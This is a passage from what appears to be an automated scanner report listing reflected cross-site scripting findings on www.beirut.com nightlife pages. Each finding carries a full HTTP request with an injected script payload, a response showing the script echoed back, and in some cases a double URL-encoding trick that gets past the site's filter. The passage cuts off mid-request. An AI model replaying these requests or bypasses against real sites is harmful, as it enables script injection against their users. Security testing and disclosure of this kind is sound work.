The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db684%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7a64b1fbb87 was submitted in the REST URL parameter 4. This input was echoed as db684"><script>alert(1)</script>7a64b1fbb87 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /Nightlife/Downtown/I-Bar/67db684%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7a64b1fbb87 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 10:11:20 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a id="moreinfo" rel="facebox" href="/moreInfo.php?contactid=67db684"><script>alert(1)</script>7a64b1fbb87&randstyle=magenta">
...[SNIP]...

4.577. http://www.beirut.com/Nightlife/Downtown/I-Bar/67 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Nightlife/Downtown/I-Bar/67

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b37c9%2527%253balert%25281%2529%252f%252fa075a4b6c42 was submitted in the REST URL parameter 4. This input was echoed as b37c9';alert(1)//a075a4b6c42 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Nightlife/Downtown/I-Bar/67b37c9%2527%253balert%25281%2529%252f%252fa075a4b6c42 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 10:12:22 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Index';
var initfacebox='';
var contactid='67b37c9';alert(1)//a075a4b6c42';
var showfacebox='';
</script>
...[SNIP]...

4.578. http://www.beirut.com/Nightlife/Gemmayzeh/Godot/85 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Nightlife/Gemmayzeh/Godot/85

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 709e2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2b037f0a052 was submitted in the REST URL parameter 4. This input was echoed as 709e2"><script>alert(1)</script>2b037f0a052 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /Nightlife/Gemmayzeh/Godot/85709e2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2b037f0a052 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 09:48:06 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a id="moreinfo" rel="facebox" href="/moreInfo.php?contactid=85709e2"><script>alert(1)</script>2b037f0a052&randstyle=blue">
...[SNIP]...

4.579. http://www.beirut.com/Nightlife/Gemmayzeh/Godot/85 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Nightlife/Gemmayzeh/Godot/85

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a51e%2527%253balert%25281%2529%252f%252ff576ccc308a was submitted in the REST URL parameter 4. This input was echoed as 8a51e';alert(1)//f576ccc308a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Nightlife/Gemmayzeh/Godot/858a51e%2527%253balert%25281%2529%252f%252ff576ccc308a HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 09:48:49 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Index';
var initfacebox='';
var contactid='858a51e';alert(1)//f576ccc308a';
var showfacebox='';
</script>
...[SNIP]...

4.580. http://www.beirut.com/Nightlife/Gemmayzeh/Joe-Penas/91 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Nightlife/Gemmayzeh/Joe-Penas/91

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f9c0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee0172335a8d was submitted in the REST URL parameter 4. This input was echoed as 4f9c0"><script>alert(1)</script>e0172335a8d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /Nightlife/Gemmayzeh/Joe-Penas/914f9c0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee0172335a8d HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 10:12:48 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a id="moreinfo" rel="facebox" href="/moreInfo.php?contactid=914f9c0"><script>alert(1)</script>e0172335a8d&randstyle=magenta">
...[SNIP]...

4.581. http://www.beirut.com/Nightlife/Gemmayzeh/Joe-Penas/91 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Nightlife/Gemmayzeh/Joe-Penas/91

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5e1d4%2527%253balert%25281%2529%252f%252fe8962f00d7e was submitted in the REST URL parameter 4. This input was echoed as 5e1d4';alert(1)//e8962f00d7e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Nightlife/Gemmayzeh/Joe-Penas/915e1d4%2527%253balert%25281%2529%252f%252fe8962f00d7e HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 10:15:50 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Index';
var initfacebox='';
var contactid='915e1d4';alert(1)//e8962f00d7e';
var showfacebox='';
</script>
...[SNIP]...

4.582. http://www.beirut.com/Nightlife/Hamra/Li-Beirut/1885 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Nightlife/Hamra/Li-Beirut/1885

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 77985%2527%253balert%25281%2529%252f%252ff4366c598f1 was submitted in the REST URL parameter 4. This input was echoed as 77985';alert(1)//f4366c598f1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Nightlife/Hamra/Li-Beirut/188577985%2527%253balert%25281%2529%252f%252ff4366c598f1 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 09:54:00 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Index';
var initfacebox='';
var contactid='188577985';alert(1)//f4366c598f1';
var showfacebox='';
</script>
...[SNIP]...

4.583. http://www.beirut.com/Nightlife/Hamra/Li-Beirut/1885 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Nightlife/Hamra/Li-Beirut/1885

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 739ea%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee9ee313d100 was submitted in the REST URL parameter 4. This input was echoed as 739ea"><script>alert(1)</script>e9ee313d100 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /Nightlife/Hamra/Li-Beirut/1885739ea%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee9ee313d100 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 09:53:23 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a id="moreinfo" rel="facebox" href="/moreInfo.php?contactid=1885739ea"><script>alert(1)</script>e9ee313d100&randstyle=magenta">
...[SNIP]...

4.584. http://www.beirut.com/Nightlife/Karantina/The-Library/113 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Nightlife/Karantina/The-Library/113

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cf766%2527%253balert%25281%2529%252f%252fdab6e86b190 was submitted in the REST URL parameter 4. This input was echoed as cf766';alert(1)//dab6e86b190 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Nightlife/Karantina/The-Library/113cf766%2527%253balert%25281%2529%252f%252fdab6e86b190 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 10:09:03 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Index';
var initfacebox='';
var contactid='113cf766';alert(1)//dab6e86b190';
var showfacebox='';
</script>
...[SNIP]...

4.585. http://www.beirut.com/Nightlife/Karantina/The-Library/113 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Nightlife/Karantina/The-Library/113

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 499fc%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee13cecdbede was submitted in the REST URL parameter 4. This input was echoed as 499fc"><script>alert(1)</script>e13cecdbede in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /Nightlife/Karantina/The-Library/113499fc%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee13cecdbede HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 10:08:08 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a id="moreinfo" rel="facebox" href="/moreInfo.php?contactid=113499fc"><script>alert(1)</script>e13cecdbede&randstyle=magenta">
...[SNIP]...

4.586. http://www.beirut.com/Nightlife/Karaoke-Lounges/8094927980 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Nightlife/Karaoke-Lounges/8094927980

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 490b3"><a>c6bc1c1db89 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Nightlife490b3"><a>c6bc1c1db89/Karaoke-Lounges/8094927980 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:24:23 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59614

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Nightlife490b3"><a>c6bc1c1db89">
...[SNIP]...

4.587. http://www.beirut.com/Nightlife/Karaoke-Lounges/8094927980 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Nightlife/Karaoke-Lounges/8094927980

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aa742'-alert(1)-'1119fa96d9b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Nightlifeaa742'-alert(1)-'1119fa96d9b/Karaoke-Lounges/8094927980 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:33:24 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59910

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Nightlifeaa742'-alert(1)-'1119fa96d9b/Karaoke-Lounges';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.588. http://www.beirut.com/Nightlife/Karaoke-Lounges/8094927980 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Nightlife/Karaoke-Lounges/8094927980

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a1d11'-alert(1)-'19f394ddeac was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Nightlife/Karaoke-Loungesa1d11'-alert(1)-'19f394ddeac/8094927980 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
